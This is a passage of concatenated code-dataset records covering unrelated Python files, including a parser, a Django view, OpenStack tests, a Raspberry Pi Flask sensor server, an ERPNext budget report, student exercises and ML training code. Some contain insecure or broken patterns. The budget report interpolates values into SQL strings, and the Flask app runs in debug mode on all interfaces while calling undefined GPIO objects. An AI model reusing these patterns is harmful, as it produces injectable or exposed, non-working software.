string\n\n Returns:\n set[BSR]: The set of BSRs that are roots of the parse tree\n \"\"\"\n\n result = set()\n for y in Y:\n g, l, k, r = y\n if g.X == start and l == 0 and r == length and len(g.beta) == 0:\n result.add(y)\n\n return result\n\n#TODO: broken\ndef find_children(Y: set[BSR], y0: BSR) -> list[BSR]:\n g0, l0, k0, r0 = y0\n lefts, rights = [], []\n for y in Y:\n g, l, k, r = y\n if l == l0 and r == k0: #TODO: other checks...\n lefts.append(y)\n elif l == k0 and r == r0: #TODO: other checks...\n rights.append(y)\n\n if r0 - k0 == 1:\n #tau[k0:r0]\n assert isinstance(g0.alpha[-1], Terminal)\n rights.append(g0.alpha[-1])\n \n pdb.set_trace()\n # return children\n\n\ndef build_tree(Y: set[BSR], node: BSR) -> list[tuple[BSR, list]]:\n children = find_children(Y, node)\n tree = []\n for child in children:\n subtree = build_tree(Y, child)\n tree.append((child, subtree))\n return tree\n\ndef bsr_tree_str(X:NonTerminal, Y:set[BSR], length:int) -> str:\n roots = find_roots(X, Y, length)\n if len(roots) == 0:\n return \"No roots found in the BSR set.\"\n\n trees = [build_tree(Y, root) for root in roots]\n pdb.set_trace()\n # return tree_to_string(tree)\n\n\n\n\n\n\n############################### Shared Packed Parse Forest ################################\n\nclass SPPF:\n def __init__(self):\n self.nodes: set[SPPFNode] = set()\n self.edges: dict[SPPFNode, list[SPPFNode]] = {}\n # add node labelled (S, 0, n)\n # add node labelled (X ::= α·δ, k)\n # check if there are any extendable leaf nodes\n # (μ, i, j) is an extendable leaf node\n # node labelled (Ω, i, j)\n # add an edge from y to the node (Ω, i, j) \n\nclass SPPFNode:...\n #ambiguous nodes...\n #...\n\ndef extractSPPF(*args, **kwargs):\n raise NotImplementedError\n\ndef sppf_tree_str(*args, **kwargs):\n raise NotImplementedError\n\n\"\"\"\nextractSPPF (Υ, Γ)\n{\n G := empty graph\n let S be the start symbol of Γ\n let n be the extent of Υ\n if Υ has an element of the form (S ::= α, 0, k, n)\n {\n create a node labelled (S, 0, n) in G\n while G has an extendable leaf node\n {\n let w = (μ, i, j) be an extendable leaf node of G\n if (μ is a nonterminal X in Γ)\n {\n for each (X ::= γ, i, k, j) ∈ Υ \n { \n mkPN(X ::= γ·, i, k, j, G) \n } \n }\n else\n {\n suppose μ is X ::= α·δ\n if (|α| = 1)\n {\n mkPN(X ::= α·δ, i, i, j, G)\n }\n else for each (α, i, k, j) ∈ Υ \n { \n mkPN(X ::= α·δ, i, k, j, G) \n } \n } \n } \n }\n return G\n}\n\nmkPN(X ::= α·δ, i, k, j, G)\n{\n make a node y in G labelled (X ::= α·δ, k)\n if (α = ϵ)\n {\n mkN(ϵ, i, i, y, G)\n }\n if (α = βx, where |x| = 1)\n {\n mkN(x, k, j, y, G)\n if (|β| = 1)\n {\n mkN(β, i, k, y, G)\n }\n if (|β| > 1)\n {\n mkN(X ::= β·xδ, i, k, y, G) \n }\n }\n}\n\nmkN (Ω, i, j, y, G)\n{\n if there is not a node labelled (Ω, i, j) in G make one\n add an edge from y to the node (Ω, i, j) \n}\n\"\"\"\n","sub_path":"src/compiler/python-tests/gll/trees.py","file_name":"trees.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"649292714","text":"from django.http import HttpResponse\n\n\ndef hello(request):\n html_str = \"\"\"\n Django test\n

Here is Mark's Django demo\n        You are at Django Demo index
\n \"\"\"\n return HttpResponse(html_str)\n","sub_path":"DjangoDemo/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"52271914","text":"#!/usr/bin/env python\n#coding=UTF-8\n\nimport re, sys\n\nmd5_re = re.compile('^.*\"([0-9A-Fa-f]{32})\".*$')\nhashes = []\ncount = 0\n\nwith open(\"NSRLFile.txt\") as fh:\n line = fh.readline()\n while line:\n elements = line.split(\",\")\n if len(elements) >= 2:\n match = md5_re.match(elements[1])\n if match:\n hashes.append(match.group(1))\n line = fh.readline()\n\nhashes.sort()\nwith open(\"src/NSRLFile.txt\", \"w\") as fh:\n for entry in hashes:\n fh.write(entry + \"\\n\")\n","sub_path":"denistify.py","file_name":"denistify.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"269605955","text":"# Copyright 2017 - Nokia Networks\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport webob\n\nfrom glare.api.middleware import version_negotiation\nfrom glare.common import exception as exc\nfrom glare.tests.unit import base\n\n\nclass TestContextMiddleware(base.BaseTestCase):\n MIME_TYPE = 'application/vnd.openstack.artifacts-'\n\n def _build_request(self, accept, path_info):\n req = webob.Request.blank(path_info)\n req.accept = accept\n return req\n\n def _build_middleware(self):\n return version_negotiation.GlareVersionNegotiationFilter(None)\n\n def test_version_request(self):\n _LINKS = [{\n \"rel\": \"describedby\",\n \"type\": \"text/html\",\n \"href\": \"http://docs.openstack.org/\",\n }]\n for path_info in ('/', '/versions'):\n expected = {'versions': [\n {\n 'version': '1.0',\n 'status': 'STABLE',\n 'links': _LINKS,\n 'media-type': 'application/vnd.openstack.artifacts-1.0',\n },\n {\n 'version': '1.1',\n 'status': 'EXPERIMENTAL',\n 'links': _LINKS,\n 'media-type': 'application/vnd.openstack.artifacts-1.1',\n }]\n }\n req = self._build_request(self.MIME_TYPE + '1.0', path_info)\n res = self._build_middleware().process_request(req)\n self.assertEqual(expected, res.json_body)\n\n def test_wrong_version(self):\n req = self._build_request(self.MIME_TYPE + 'INVALID', '/artifacts')\n self.assertRaises(exc.BadRequest,\n self._build_middleware().process_request, req)\n\n def test_too_big_version(self):\n req = self._build_request(self.MIME_TYPE + '10000.0', '/artifacts')\n self.assertRaises(exc.InvalidGlobalAPIVersion,\n self._build_middleware().process_request, req)\n\n def test_latest_version(self):\n req = self._build_request(self.MIME_TYPE + 'latest', '/artifacts')\n self._build_middleware().process_request(req)\n self.assertEqual('1.1', req.api_version_request.get_string())\n\n def test_version_unknown(self):\n req = self._build_request('UNKNOWN', '/artifacts')\n self._build_middleware().process_request(req)\n self.assertEqual('1.0', req.api_version_request.get_string())\n\n def test_response(self):\n res = webob.Response()\n req = 
self._build_request('1.0', '/artifacts')\n mw = self._build_middleware()\n mw.process_request(req)\n mw.process_response(res, req)\n self.assertIn('openstack-api-version', res.headers)\n self.assertEqual('artifact 1.0', res.headers['openstack-api-version'])\n self.assertIn('Vary', res.headers)\n self.assertEqual('openstack-api-version', res.headers['Vary'])\n","sub_path":"glare/tests/unit/middleware/test_version_negotiations.py","file_name":"test_version_negotiations.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"44721277","text":"from flask import Flask, render_template, request\nimport json\nimport requests\nfrom threading import Thread\nimport time\nimport datetime\n'''import RPi.GPIO as GPIO\n#GPIO.cleanup()\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(21, GPIO.OUT)\nGPIO.output(21, GPIO.LOW)\n\nimport w1thermsensor\nsensor = w1thermsensor.W1ThermSensor()\nimport Adafruit_DHT as dht\nDHT_PIN_NR = 2\ntemp = sensor.get_temperature()\nprint(temp)\nh,t = dht.read_retry(dht.DHT22, DHT_PIN_NR)\nprint(h, t)\n'''\napp = Flask(__name__)\n\ndataDict = {\n \"out1\": 0,\n \"tempOut\": 0,\n \"tempIn\": 0,\n \"humIn\": 0,\n \"temperatureTable\": []\n}\nprint(dataDict)\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/getData')\ndef getData():\n global dataDict\n jsn = json.dumps(dataDict)\n print(jsn)\n return str(jsn)\n\n@app.route('/outputStateOn')\ndef outputStateOn():\n GPIO.output(21, GPIO.HIGH)\n dataDict[\"out1\"] = 1\n print(\"state 1\")\n return \"state 1\"\n\n@app.route('/outputStateOff')\ndef outputStateOff():\n GPIO.output(21, GPIO.LOW)\n dataDict[\"out1\"] = 0\n print(\"state 0\")\n return \"state 0\"\n\n@app.route('/nodeMcu', methods=['GET', 'POST'])\ndef nodeMcu():\n requestStr = \"http://192.168.1.4?\" + \\\n \"pwm5=\" + request.form.get('pwm5') + \"&\" \\\n \"pwm6=\" + request.form.get('pwm6') + \"&\" \\\n \"pwm7=\" + request.form.get('pwm7')\n print(requests.get(requestStr).content)\n return \"node mcu ok\"\n\ndef holdTemperatureValue(tempIn, tempOut, timeStr):\n global dataDict\n print(dataDict[\"temperatureTable\"])\n if len(dataDict[\"temperatureTable\"]) >= 12:\n dataDict[\"temperatureTable\"].pop(0)\n\n dataDict[\"temperatureTable\"].append([timeStr, tempOut, tempIn])\n\n #print(dataDict[\"temperatureTable\"])\n\nactualHour = -1\ndef measure():\n global dataDict\n global actualHour\n while True:\n dataDict[\"tempOut\"] = round(sensor.get_temperature(), 1)\n h,t = dht.read_retry(dht.DHT22, DHT_PIN_NR)\n dataDict[\"tempIn\"] = round(t, 1)\n dataDict[\"humIn\"] = round(h, 1)\n dataDict[\"out1\"] = GPIO.input(21)\n\n if actualHour != datetime.datetime.now().hour:\n actualHour = datetime.datetime.now().hour\n hourStr = str(actualHour) + \":00\"\n holdTemperatureValue(dataDict[\"tempIn\"], dataDict[\"tempOut\"], hourStr)\n\n #print(dataDict)\n time.sleep(10)\n\nif __name__ == '__main__':\n Thread(target=measure).start()\n app.run(debug=True, use_reloader=False, host='0.0.0.0')\n #app.run(debug=True, host='0.0.0.0')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"579841779","text":"# validate Filters\nflt_dict = {'fiscal_year': 'Fiscal Year', 'period': 'Period'}\nfor f in flt_dict:\n if not filter_values.get(f):\n msgprint(\"Please Select \" + cstr(flt_dict[f]))\n raise Exception\n\n# Get Values from 
fliters\nfiscal_year = filter_values.get('fiscal_year')\nperiod = filter_values.get('period')\nunder = \"GL Entry\"\nbased_on = \"Cost Center\"\n\n#add distributed id field\ncol = []\ncol.append([based_on,'Date','150px',''])\ncol.append(['Budget Allocated','Currency','150px',''])\ncol.append(['Distribution Id','Date','150px',''])\n\nfor c in col:\n colnames.append(c[0])\n coltypes.append(c[1])\n colwidths.append(c[2])\n coloptions.append(c[3])\n \n col_idx[c[0]] = len(colnames)-1\n\ndef make_child_lst(based_on,name):\n rg = sql(\"select lft, rgt from `tab%s` where name = '%s'\"%(based_on,name))\n ch_name = sql(\"select name from `tab%s` where lft between %d and %d\"%(based_on,int(rg[0][0]),int(rg[0][1])))\n chl ='('\n flag = 1\n for c in ch_name:\n if flag == 1:\n chl += \"'%s'\"%c[0]\n flag = 2\n else:\n chl +=\",'%s'\"%c[0]\n\n chl +=\")\"\n return chl\n\n\n\nfor r in res:\n \n cond1 =\" t1.fiscal_year ='%s' and t1.parent=t2.name and t1.parenttype = '%s' and t1.docstatus !=2\"\n \n q = \"select t1.name from `tabBudget Detail` t1, `tab%s` t2 where \"+cond1+\" and t2.name = '%s'\"\n ch = sql(q%(based_on,fiscal_year,based_on,r[0].strip()))\n q1 = \"select sum(t1.budget_allocated) from `tabBudget Detail` t1, `tab%s` t2, `tabAccount` t3 where \"\n cond2 = \" t3.is_pl_account = 'Yes' and t3.debit_or_credit = 'Debit' and t3.name = t1.account and t1.docstatus != 2 and \"\n if ch:\n \n qur = q1+cond2+cond1+\" and t2.name = '%s'\"\n ret_amt = sql(qur%(based_on,fiscal_year,based_on,r[0].strip()))\n \n\n #---------------------------------------------------------------- \n else:\n node_lst = make_child_lst(based_on,r[0].strip())\n qur = q1+cond1+' and '+cond2+\" t2.name in %s\"\n\n ret_amt = sql(qur%(based_on,fiscal_year,based_on,node_lst)) \n\n #---------------------------------------------------------------- \n ret_dis_id = sql(\"select distribution_id from `tab%s` where name = '%s'\"%(based_on,r[0].strip()))\n\n target_amt = ret_amt and flt(ret_amt[0][0]) or 0\n dis_id = ret_dis_id and ret_dis_id[0][0] or ''\n\n r.append(target_amt)\n r.append(dis_id)\n \n\n\n# Set required field names \nbased_on_fn = 'cost_center'\n\ndate_fn = 'posting_date' \n\nmon_list = []\n\ndata = {'start_date':0, 'end_date':1}\n\ndef make_month_list(append_colnames, start_date, mon_list, period, colnames, coltypes, colwidths, coloptions, col_idx):\n count = 1\n if period == 'Quarterly' or period == 'Half Yearly' or period == 'Annual': mon_list.append([str(start_date)])\n for m in range(12):\n # get last date\n last_date = str(sql(\"select LAST_DAY('%s')\" % start_date)[0][0])\n \n # make mon_list for Monthly Period\n if period == 'Monthly' :\n mon_list.append([start_date, last_date])\n # add months as Column names\n month_name = sql(\"select MONTHNAME('%s')\" % start_date)[0][0]\n append_colnames(str(month_name)[:3], colnames, coltypes, colwidths, coloptions, col_idx)\n \n # get start date\n start_date = str(sql(\"select DATE_ADD('%s',INTERVAL 1 DAY)\" % last_date)[0][0])\n \n # make mon_list for Quaterly Period\n if period == 'Quarterly' and count % 3 == 0: \n mon_list[len(mon_list) - 1 ].append(last_date)\n # add Column names\n append_colnames('Q '+ str(count / 3), colnames, coltypes, colwidths, coloptions, col_idx)\n if count != 12: mon_list.append([start_date])\n \n # make mon_list for Half Yearly Period\n if period == 'Half Yearly' and count % 6 == 0 :\n mon_list[len(mon_list) - 1 ].append(last_date)\n # add Column Names\n append_colnames('H'+str(count / 6), colnames, coltypes, colwidths, coloptions, col_idx)\n if 
count != 12: mon_list.append([start_date])\n\n # make mon_list for Annual Period\n if period == 'Annual' and count % 12 == 0:\n mon_list[len(mon_list) - 1 ].append(last_date)\n # add Column Names\n append_colnames('', colnames, coltypes, colwidths, coloptions, col_idx)\n count = count +1\n\ndef append_colnames(name, colnames, coltypes, colwidths, coloptions, col_idx):\n col = ['Target', 'Actual', 'Variance']\n for c in col:\n n = str(name) and ' (' + str(name) +')' or ''\n colnames.append(str(c) + n)\n coltypes.append('Currency')\n colwidths.append('150px')\n coloptions.append('')\n col_idx[str(c) + n ] = len(colnames) - 1\n\n\n\n# make default columns\n#coltypes[col_idx[based_on]] = 'Link'\n#coloptions[col_idx[based_on]]= based_on\n\n# get start date\nstart_date = get_value('Fiscal Year', fiscal_year, 'year_start_date')\nif not start_date:\n msgprint(\"Please Define Year Start Date for Fiscal Year \" + str(fiscal_year))\n raise Exception\nstart_date = start_date.strftime('%Y-%m-%d')\n\n# make month list and columns\nmake_month_list(append_colnames, start_date, mon_list, period, colnames, coltypes, colwidths, coloptions, col_idx)\n\n\nbc_obj = get_obj('Budget Control')\nfor r in res:\n count = 0\n\n for idx in range(3, len(colnames), 3):\n cidx = 2\n\n # ================= Calculate Target ==========================================\n r.append(bc_obj.get_monthly_budget( r[cidx], fiscal_year, mon_list[count][data['start_date']], mon_list[count][data['end_date']], r[cidx-1]))\n \n #================== Actual Amount =============================================\n actual = 0\n\n ch = make_child_lst(based_on,r[0].strip())\n \n actual = sql(\"select sum(ifnull(t1.debit,0))-sum(ifnull(t1.credit,0)) from `tabGL Entry` t1, `tabAccount` t2 where t2.is_pl_account = 'Yes' and t1.is_cancelled = 'No' and t1.cost_center in %s and t2.debit_or_credit = 'Debit' and t1.posting_date between '%s' and '%s' and t1.account = t2.name\"%(ch, mon_list[count][data['start_date']], mon_list[count][data['end_date']]))\n \n #----------------------------------------------------------\n actual = flt(actual[0][0])\n r.append(actual)\n # ================ Variance ===================================================\n r.append(r[idx] - r[idx + 1])\n count = count +1","sub_path":"accounts/search_criteria/budget_variance_report/budget_variance_report.py","file_name":"budget_variance_report.py","file_ext":"py","file_size_in_byte":6307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"31194539","text":"def merge(left, right) :\n alist = []\n while len(left) != 0 and len(right) != 0:\n if left[0] < right[0] :\n alist.append(left[0])\n left.remove(left[0])\n else :\n alist.append(right[0])\n right.remove(right[0])\n\n if len(right) == 0 :\n alist += left\n else :\n alist += right\n return alist\n\ndef mergeSort(alist) :\n if len(alist) > 1 :\n mid = len(alist) // 2\n left = alist[:mid]\n right = alist[mid:]\n\n left = mergeSort(left)\n right = mergeSort(right)\n return merge(left, right)\n return alist\n\nalist1 = [10, 9, 8, 7, 6, 5, 4, 3, 2, 1]\nalist2 = [7, 9, 4, 2, 1, 3, 5, 10, 6, 8]\nalist3 = [2, 1, 3, 4, 5, 6, 7, 8, 9, 10]\n\nprint(alist1)\nprint(mergeSort(alist1))\n\nprint(alist2)\nprint(mergeSort(alist2))\n\nprint(alist3)\nprint(mergeSort(alist3))","sub_path":"Doo/알고리즘/MergeSort.py","file_name":"MergeSort.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"564278011","text":"# 
Family name: Hrithik Shah\n# Student number: 300069290\n# Course: IT1 1120 \n# Assignment Number 1\n\nimport math\nimport turtle\nimport random\n\n###################################################################\n# Question 1\n###################################################################\n\ndef pythagorean_pair (a,b):\n \"\"\"\n (number,number-->number)\n Description: Takes two numbers and uses the Pythagorean Theorem to\n check if the hypotenuse is an integer\n Precondition: a,b have to be positive numbers\n \"\"\"\n c = math.sqrt((a*a) + (b*b))\n return c%1 == 0\n\n\n###################################################################\n# Question 2\n###################################################################\n\ndef mh2kh (s):\n \"\"\"\n (number-->number)\n Description: Takes speed in miles/h and converts to km/h\n Precondition: none\n \"\"\"\n return s*1.609344\n\n\n###################################################################\n# Question 3\n###################################################################\n\ndef in_out(xs,ys,side):\n \"\"\"\n (number, number, number-->boolean)\n Description: Checks if a point is in a given square\n Precondition: side is non-negative number\n \"\"\"\n x=float(input(\"Give me a x-coordinate: \"))\n y=float(input(\"Give me a y-coordinate: \"))\n print(x>=xs and x<=xs+side and y>=ys and y<=ys+side)\n\n\n###################################################################\n# Question 4\n###################################################################\n\ndef safe(n):\n \"\"\"\n (number-->boolean)\n Description: determine if a number is safe (does not contain a 9 or doesn't divide by 9)\n Precondition: n is non-negative, maximum two-digit integer\n \"\"\"\n return ((n//10 != 9 and n%10 != 9) and n%9 != 0)\n\n\n###################################################################\n# Question 5\n###################################################################\n\ndef quote_maker(quote, name, year):\n \"\"\"\n (string, string, string-->string)\n Description: outputs a quote in a specified format\n Precondition: quote has has to be a string, name has to be a string and year has to be an int\n \"\"\"\n return ('In '+str(year)+', a person called '+name+' said: \"'+quote+'\"')\n\n\n###################################################################\n# Question 6\n###################################################################\n\ndef quote_displayer():\n \"\"\"\n (nothing-->string)\n Description: asked user for a quote, name and year, and outputs it in a specific format\n Precondition: none\n \"\"\"\n quote=str(input(\"Give me a quote: \"))\n name=str(input(\"Who said that? \"))\n year= str(input(\"What year did she/he say that? \"))\n return ('In '+year+', a person called '+name+' said: \"'+quote+'\"')\n\n###################################################################\n# Question 7\n###################################################################\n\ndef rps_winner ():\n \"\"\"\n ask user for two strings --> print boolean values\n Description: Figures out who wins in a game of rock paper scizzors\n Preconditions: inputs must be strings\n \"\"\"\n p1 = str(input(\"What choice did player 1 make? \\nType one of the following options: rock, paper, scissors: \"))\n p2 = str(input(\"What choice did player 2 make? \\nType one of the following options: rock, paper, scissors: \"))\n print (\"Player 1 wins. 
That is \"+str((((p1 == 'rock') and (p2 == 'scissors')) or ((p1 == 'scissors') and (p2 == 'paper')) or ((p1 == 'paper') and (p2 == 'rock')))))\n print (\"It is a tie. That is not \"+ str(not(p1 == p2)))\n\n###################################################################\n# Question 8\n###################################################################\n\ndef fun (x):\n \"\"\"\n number --> number\n Description: takes a number and uses an equation to come up with a value for y.\n Preconditions: x must be a positive integer\n \"\"\"\n y = (math.log(x+3,10))/4\n return y\n\n###################################################################\n# Question 9\n###################################################################\n\ndef ascii_name_plaque (name):\n \"\"\"\n string --> string\n Description: uses a name to create a name plaque\n Preconditions: must be a string\n \"\"\"\n length = len(name)\n plaque = \"*****\" + \"*\"*length + \"*****\\n\" + \"* \" + \" \"*length + \" *\\n\" + \"* __\" + name + \"__ *\\n\" + \"* \" + \" \"*length + \" *\\n\" + \"*****\" + \"*\"*length + \"*****\\n\"\n print (plaque)\n\n###################################################################\n# Question 10\n###################################################################\n\ndef my_fun_drawing ():\n \"\"\"\n nothing --> drawing\n Description: uses Turtle graphics to draw a fractal tree\n Preconditions: none\n \"\"\"\n screen = turtle.Screen()\n drawer = turtle.Turtle()\n drawer.speed(\"fastest\")\n drawer.penup()\n drawer.left(90)\n drawer.backward(200)\n drawer.pendown()\n tree(100,drawer)\n\ndef tree(length,d):\n \"\"\"\n number,turtle --> drawing\n Description: this is where the drawing takes place\n Preconditions: length has to be positive\n \"\"\"\n if length == 10:\n d.color (random_colour())\n d.forward(length)\n d.left(22.5)\n tree(length-10,d)\n d.color (random_colour())\n d.right(45)\n tree(length-10,d)\n d.color (random_colour())\n d.left(22.5)\n d.backward(length)\n if length > 10:\n d.color (\"black\")\n d.forward(length)\n d.left(22.5)\n tree(length-10,d)\n d.right(45)\n tree(length-10,d)\n d.left(22.5)\n d.backward(length)\n\ndef random_colour ():\n \"\"\"\n nothing --> color\n Description: this is where a random color is generation\n Preconditions: none\n \"\"\"\n colour = [\"yellow\",\"turquoise\",\"red\",\"orange\", \"blue\", \"magenta\", \"green\"]\n return random.choice(colour)\n \n\n###################################################################\n# Question 11\n###################################################################\n\ndef alogical (n):\n \"\"\"\n number --> number\n Description: takes a number and sees how many times 2 can be divided from it until the resultant is less than or equal to 1\n Preconditions: must be a number 1 or greater\n \"\"\"\n x = math.ceil(math.log(n,2))\n print(x)\n\n###################################################################\n# Question 12\n###################################################################\n\ndef time_format (h,m):\n \"\"\"\n number,number --> string\n Description: takes hour and minute as input and puts it into a descriptive string\n Preconditions: h is between 0 and 23 and m is between 0 and 59\n \"\"\"\n m = int(round(m/5)*5)\n if (m == 0):\n return str(h)+ \" o'clock\"\n elif (m == 60 and h == 23):\n return \"0 o'clock\"\n elif (m == 60):\n return str(h+1) + \" o'clock\"\n elif (m == 30):\n return \"half past \" +str(h)+ \" o'clock\"\n elif (m < 30):\n return str(m) + \" minutes past \" +str(h)+ \" o'clock\"\n 
elif(h==23):\n return str(60-m) + \" minutes to \" +str(0)+ \" o'clock\"\n else:\n return str(60-m) + \" minutes to \" +str(h+1)+ \" o'clock\"\n\n###################################################################\n# Question 13\n###################################################################\n\ndef cad_cashier (price, payment):\n p1 = (round(price/0.05)*0.05)*100\n p2 = (round(payment/0.05)*0.05)*100\n change=round(p2-p1)/100\n return(change)\n \n###################################################################\n# Question 14\n###################################################################\n\ndef min_CAD_coins (price, payment):\n \"\"\"\n number,number --> number\n Description: uses cad_cashier to find change and determines minimum number of coins needed to make transactions\n Preconditions: price and payment must both be positive and have only two decimal places\n \"\"\"\n change = cad_cashier (price,payment) * 100\n #print(change)\n t = (int(change/200))\n #print (change/200)\n lo = (int((change - t*200)/100))\n #print (change - t*200)\n q = (int((change - t*200 - lo*100)/25))\n #print (change - t*200 - lo*100)\n d = (int((change - t*200 - lo*100 - q*25)/10))\n #print (change - t*200 - lo*100 - q*10)\n n = (int((change - t*200 - lo*100 - q*25 - d*10)/5))\n # print ((change - t*200 - lo*100 - q*25 - d*10)/5)\n # print (t)\n # print (lo)\n # print (q)\n # print (d)\n # print (n)\n return (t,lo,q,d,n)\n \n \n \n\n\n \n\n","sub_path":"Assignments/A1_300069290/a1_300069290.py","file_name":"a1_300069290.py","file_ext":"py","file_size_in_byte":8768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"438197219","text":"\n\nclass Tree:\n def __init__(self, size, parent=0):\n self.size = size\n self.parent = parent\n\n\ndef make_set(x):\n x.parent = x\n\n\ndef union(x, y):\n x_root = find(x)\n y_root = find(y)\n if x_root != y_root:\n y_root.parent = x_root\n x_root.size = x_root.size + y_root.size\n\n return x_root.size\n\n\ndef find(x):\n\n if x.parent == x:\n return x\n else:\n x.parent = find(x.parent)\n return x.parent\n\n\nn, e, d = map(int, input().split())\n\nforest = [Tree(x) for x in range(n)]\n\nfor tree in forest:\n make_set(tree)\n\n# print(forest)\n\nfor __ in range(e):\n i, j = map(int, input().split())\n i -= 1\n j -= 1\n\n union(forest[i], forest[j])\n\n\nfor __ in range(d):\n i, j = map(int, input().split())\n i -= 1\n j -= 1\n\n if forest[i].parent == forest[j].parent:\n print(0)\n exit()\n\nprint(1)\n\n\n\n","sub_path":"stepik_algorithm_data_structs/2_3_4_links.py","file_name":"2_3_4_links.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"605188086","text":"import torch\nfrom torch.nn import functional\nfrom torch.autograd import Variable\n\n\n### Softmax on predicted words in the batch:\n # - The actuals (A) have the shape (batch_size, true classes) (Note: batch_size = no of sentences, true_class = vocabulary )\n # - The predicted (P) words (classes) have the shape (batch_size, max_lenght_in_batch, vocab size). [By max_length_in_batch I mean the length corresponding to the largest sentence in the bacth]\n # - P is now unrolled to have the shape (batch_size*max_length_in_batch, vocab_size)\n # - The indicator function is now applied. (It extracts the loss corresponding to the true label and rejects all the other loss.) 
Hence, P is now reduced to the size, (batch_size*max_length_in_batch, 1)\n # - P is now reshaped and converted back to the generic shape. (batch_size, max_length_in_batch)\n # - We know that every sentence in the batch doesn't have a length equal to max_length. Hence, the losses for words > (max_length of that particular sentence) are replaced with zeros.\n # - Finally, loss = (P[i,:].sum()/length).sum() for i in batch_size\n\ndef sequence_mask(sequence_length, max_len=None):\n if max_len is None:\n max_len = sequence_length.data.max()\n batch_size = sequence_length.size(0)\n seq_range = torch.range(0, max_len - 1).long()\n seq_range_expand = seq_range.unsqueeze(0).expand(batch_size, max_len)\n seq_range_expand = Variable(seq_range_expand)\n if sequence_length.is_cuda:\n seq_range_expand = seq_range_expand.cuda()\n seq_length_expand = (sequence_length.unsqueeze(1)\n .expand_as(seq_range_expand))\n return seq_range_expand < seq_length_expand\n\n\ndef masked_cross_entropy(logits, target, length):\n length = Variable(torch.LongTensor(length)).cuda()\n\n \"\"\"\n Args:\n logits: A Variable containing a FloatTensor of size\n (batch, max_len, num_classes) which contains the\n unnormalized probability for each class.\n target: A Variable containing a LongTensor of size\n (batch, max_len) which contains the index of the true\n class for each corresponding step.\n length: A Variable containing a LongTensor of size (batch,)\n which contains the length of each data in a batch.\n Returns:\n loss: An average loss value masked by the length.\n \"\"\"\n\n # logits_flat: (batch * max_len, num_classes)\n logits_flat = logits.view(-1, logits.size(-1))\n # log_probs_flat: (batch * max_len, num_classes)\n log_probs_flat = functional.log_softmax(logits_flat)\n # target_flat: (batch * max_len, 1)\n target_flat = target.view(-1, 1)\n # losses_flat: (batch * max_len, 1)\n losses_flat = -torch.gather(log_probs_flat, dim=1, index=target_flat)\n # losses: (batch, max_len)\n losses = losses_flat.view(*target.size())\n # mask: (batch, max_len)\n mask = sequence_mask(sequence_length=length, max_len=target.size(1))\n losses = losses * mask.float()\n loss = losses.sum() / length.float().sum()\n return loss","sub_path":"Trials/model_1/masked_cross_entropy.py","file_name":"masked_cross_entropy.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"102620574","text":"from publisher.service import PublisherService\nfrom libs.services import LazyServiceWrapper\n\nMESSAGES_COUNT = 50\nMESSAGES_TIMEOUT = 5\nMESSAGES_TIMEOUT_SHORT = 2\n\nbackend = LazyServiceWrapper(\n backend_base=PublisherService,\n backend_path='publisher.service.PublisherService',\n options={}\n)\nbackend.expose(locals())\n","sub_path":"polyaxon/publisher/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"413315745","text":"import os\nimport cv2\nimport time\nimport random\nimport traceback\nimport numpy as np\nimport tensorflow as tf\nfrom utils.visualize import image_with_cv2 as vic\nfrom utils.image import data_aug\nfrom utils.data.tfrecords import parse_function\nfrom utils.model import save_model\n\nFLAGS = tf.flags.FLAGS\ntf.flags.DEFINE_string('model_dir', '../model/', 'Directory of model checkpoint file')\ntf.flags.DEFINE_string('model_name', 'p2c', 'Name of the checkpoint file, excluding 
\\'.ckpt\\'')\ntf.flags.DEFINE_string('train_dir', '../train/', 'Directory to save training log file')\ntf.flags.DEFINE_integer('batch_size', 1, 'Batch size of each iteration')\ntf.flags.DEFINE_integer('epoch_num', 1, 'Total epoch number')\ntf.flags.DEFINE_float('learning_rate', 0.0001, 'Initial learning rate')\ntf.flags.DEFINE_bool('continue_training', False, 'Continue training or not')\ntf.flags.DEFINE_string('run_name', '', 'Name of this run')\ntf.flags.DEFINE_integer('save_step', 100, 'Number of steps to save model once')\ntf.flags.DEFINE_integer('sample_step', 100, 'Numbers of steps to take sample')\ntf.flags.DEFINE_bool('debug_mode', False, 'Is debugging or not')\ntf.flags.DEFINE_integer('temp_step', 0, 'The fake global step')\ntf.flags.DEFINE_float('val_ratio', 0, 'Validation ratio')\n\n\ndef save_sample(sample_image, sample_filename, run_dir, x, y, z, comparison_coordinates: list = None,\n label: bool = False):\n o_0 = cv2.applyColorMap(sample_image, cv2.COLORMAP_BONE)\n o_0 = vic.image_with_skeleton(o_0, 